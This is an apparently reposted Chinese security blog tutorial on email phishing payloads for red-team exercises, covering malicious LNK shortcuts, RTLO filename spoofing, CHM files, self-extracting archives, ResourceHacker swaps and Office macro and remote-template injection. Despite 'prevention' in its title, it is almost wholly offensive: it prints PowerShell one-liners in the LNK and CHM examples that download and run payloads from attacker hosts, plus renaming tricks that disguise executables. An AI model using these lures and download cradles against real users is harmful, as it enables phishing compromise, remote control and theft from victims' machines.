邮件钓鱼攻击解析与防范学习

admin 2024年5月21日23:18:36评论16 views字数 2382阅读7分56秒阅读模式
  • 前言

在常年攻防演练以及红蓝对抗中常被用于红方攻击的一种进行打点的方式,由于本人只是个安服仔,接触的比较少(但也不能不学),就有了这篇文章,参考各位大佬的姿势总结一下。

钓鱼手段

Lnk(快捷方式)

可以在“⽬标”栏写⼊⾃⼰的恶意命令,如powershell上线命令等,这里举例为CMD



邮件钓鱼攻击解析与防范学习


当我点击谷歌浏览器时,弹出了CMD



邮件钓鱼攻击解析与防范学习


可以进行更改图标



邮件钓鱼攻击解析与防范学习


  • 快速生成lnk样本

$WshShell = New-Object -comObject WScript.Shell  
$Shortcut = $WshShell.CreateShortcut("test.lnk")
$Shortcut.TargetPath = "%SystemRoot%system32cmd.exe"
$Shortcut.IconLocation = "%SystemRoot%System32Shell32.dll,21"
$Shortcut.Arguments = "cmd /c powershell.exe -nop -w hidden -c IEX (new-object net.webclient).DownloadFile('http://192.168.1.7:8000/ascotbe.exe','.\ascotbe.exe');&cmd /c .\ascotbe.exe"
$Shortcut.Save()

运行

powershell -ExecutionPolicy RemoteSigned -file test.ps1



邮件钓鱼攻击解析与防范学习


  • Tips

目标文件位置所能显示最大字符串为260个,所有我们可以把执行的命令放在260个字符后面

$file = Get-Content ".test.txt"  
$WshShell = New-Object -comObject WScript.Shell
$Shortcut = $WshShell.CreateShortcut("test.lnk")
$Shortcut.TargetPath = "%SystemRoot%system32cmd.exe"
$Shortcut.IconLocation = "%SystemRoot%System32Shell32.dll,21"
$Shortcut.Arguments = ' '+ $file
$Shortcut.Save()

文件后缀RTLO

他会让字符串倒着编码



邮件钓鱼攻击解析与防范学习


  • 用Python一键生成用,把txt改为png后缀

import os  
os.rename('test.txt', 'test-‮gnp.txt')
import os
os.rename('cmd.exe', u'no‮FDP.exe')

CHM文档

创建一个文件夹(名字随意),在文件夹里面再创建两个文件夹(名字随意)和一个index.html文件,在两个文件夹内部创建各创建一个index.html文件。然后先将下列代码复制到根文件夹中的index.html中



邮件钓鱼攻击解析与防范学习


  • 在index.html文件中编辑

<!DOCTYPE html><html><head><title>Mousejack replay</title><head></head><body>
command exec
<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
<PARAM name="Command" value="ShortCut">
<PARAM name="Button" value="Bitmap::shortcut">
<PARAM name="Item1" value=',calc.exe'>
<PARAM name="Item2" value="273,1,1">
</OBJECT>
<SCRIPT>
x.Click();
</SCRIPT>
</body></html>
  • 使用cs生成修改模版中的calc.exe

<!DOCTYPE html><html><head><title>Mousejack replay</title><head></head><body>
command exec
<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
<PARAM name="Command" value="ShortCut">
<PARAM name="Button" value="Bitmap::shortcut">
<PARAM name="Item1" value=",powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('http://192.168.1.100:81/a'))">
<PARAM name="Item2" value="273,1,1">
</OBJECT>
<SCRIPT>
x.Click();
</SCRIPT>
</body></html>
  • 使用EasyCHM编译



邮件钓鱼攻击解析与防范学习


  • 原有模版CMD



邮件钓鱼攻击解析与防范学习


  • ps上线



邮件钓鱼攻击解析与防范学习


自解压

  • 使用CS生成木马



邮件钓鱼攻击解析与防范学习


  • 创建自解压文件



邮件钓鱼攻击解析与防范学习


  • 高级自解压选项



邮件钓鱼攻击解析与防范学习


  • 解压路径-绝对路径



邮件钓鱼攻击解析与防范学习


  • 提取后运行



邮件钓鱼攻击解析与防范学习


  • 静默模式



邮件钓鱼攻击解析与防范学习


  • 更新模式



邮件钓鱼攻击解析与防范学习


  • 修改文件名



邮件钓鱼攻击解析与防范学习


ResourceHacker



邮件钓鱼攻击解析与防范学习


  • 打开flash安装文件导出资源



邮件钓鱼攻击解析与防范学习


  • 替换资源文件



邮件钓鱼攻击解析与防范学习




邮件钓鱼攻击解析与防范学习


  • 上线



邮件钓鱼攻击解析与防范学习




邮件钓鱼攻击解析与防范学习




office宏

本地加载

  • 新建word,创建宏



邮件钓鱼攻击解析与防范学习


  • cs生成宏粘贴



邮件钓鱼攻击解析与防范学习




邮件钓鱼攻击解析与防范学习


  • 保存为启用宏的文档



邮件钓鱼攻击解析与防范学习


  • 打开文档上线



邮件钓鱼攻击解析与防范学习


远程加载

编写一个带有宏代码的DOTM文档,并启用一个http服务将DOTM放置于web下


邮件钓鱼攻击解析与防范学习




邮件钓鱼攻击解析与防范学习




邮件钓鱼攻击解析与防范学习


  • 新建一个任意的模版的docx文档并且解压



邮件钓鱼攻击解析与防范学习




邮件钓鱼攻击解析与防范学习


  • 编辑settings.xml.rels文件中的Target为我们第一个DOTM的http地址



邮件钓鱼攻击解析与防范学习


  • 重新压缩改后缀名为.docx



邮件钓鱼攻击解析与防范学习


  • 模拟点击上线



邮件钓鱼攻击解析与防范学习


From:https://www.chabug.org/tools/2017

原文始发于微信公众号(巡安似海):邮件钓鱼攻击解析与防范学习

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年5月21日23:18:36
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   邮件钓鱼攻击解析与防范学习https://cn-sec.com/archives/2016475.html

发表评论

匿名网友 填写信息